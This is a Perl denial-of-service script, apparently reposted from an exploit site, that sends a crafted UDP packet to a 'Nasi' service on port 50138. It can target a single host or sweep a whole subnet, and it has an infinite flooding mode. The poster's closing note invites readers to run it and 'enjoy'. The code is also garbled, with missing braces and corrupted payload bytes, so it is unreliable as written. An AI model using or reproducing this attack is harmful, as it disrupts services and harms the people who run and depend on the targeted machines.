DDos NetWorking [LAN]


use IO::Socket;

if (@ARGV < 1)
print “\n”;
print ” \/[DoS for All Nassi <= 3.2 build 2260]===[v0.1]=====\\\n”;
print ” \| ___ ___ ___ ___ ___ \|\n”;
print ” \| N /s/ T N /s/ T N /s/ T N /s/ T N /s/ T \|\n”;
print ” \| — — — — — \|\n”;
print ” \| \|\n”;
print ” \| Tested on: Nasi 3.2 build 2260 www.gracebyte.com \|\n”;
print ” \| \|\n”;
print ” \| Usage: nasidos.pl [port] [-i] \|\n”;
print ” \| \|\n”;
print ” \| Example: nasidos.pl \|\n”;
print ” \| nasidos.pl 12345 \|\n”;
print ” \| nasidos.pl 192.168.102.* \|\n”;
print ” \| nasidos.pl -i \|\n”;
print ” \| \|\n”;
print ” \| Keys: -i - Infinite DoS. Use ctrl+c for stop it. \|\n”;
print ” \| * - All in subnet. \|\n”;
print ” \| \|\n”;
print ” \| Info: If still don’t work try to scan victem on \|\n”;
print ” \| open UDP ports. Maby use not default port \|\n”;
print ” \| for Nasi. \|\n”;
print ” \\==================================================\/\n”;

$flag = 0; # Default flag for symple DoS

$ip = $ARGV[0];

if ($ARGV[1] =~ /[0-9]/)
$port = $ARGV[1];
print “\n[*] - We use $ARGV[1] UDP port for Nasi \n”;
$port = 50138;
print “\n[*] - We use 50138 (default) UDP port for Nasi \n”;

if ($ARGV[2] =~ /^\-i/ || $ARGV[1] =~ /^\-i/ )
print ”[*] - Start infinity DoS to $ARGV[0] on port $port\n”;

$i = 0;



($a,$b,$c,$d) = split(/\./,$ip);

if($ARGV[1] =~ /^\-i/ || $ARGV[2] =~ /^\-i/)
$i = $i + 1;
$d = $i;
$flag = 2;


if($ip =~ /\*/ && ($ARGV[1] !~ /^\-i/ || $ARGV[2] !~ /^\-i/))
$i = $i + 1;
$d = $i;
$flag = 1;


if($ip =~ /\*/ && ($ARGV[1] =~ /^\-i/ || $ARGV[2] =~ /^\-i/))
$i = $i + 1;
$d = $i;
$flag = 2;

print ”[*] - Try connect to ” . $a . “\.” . $b . “\.” . $c . “\.” . $d . ” on port $port\n”;

$remote = IO::Socket::INET->new( Proto => “udp”,
PeerAddr => $a . “\.” . $b . “\.” . $c . “\.” . $d,
PeerPort => $port) or die “\n [-] - Can’t connect to ” . $a . “\.” . $b . “\.” . $c . “\.” . $d . ” on port $port \n”;
$insock = “0  E O?a }a??2? ???? ;K?3 AB??LL¶?®‡??…?f,s5•??°?S ?e??B?« adcJ?“?s???;” . a x 218;

print $remote “$insock”; # Put magic into port

close $remote;

print ” [+] - DoS on ” . $a . “\.” . $b . “\.” . $c . “\.” . $d . ” complited!!!\n\n”; # Display small info

if ($flag == 1 && $i > 254)

if ($i > 254)
$i = $d = 0;

} until ($flag == 0)

Note :
U must Install perl in Windows, Copy script save for ext.PL in directory Perl, RunnIng, enjoy and Stay


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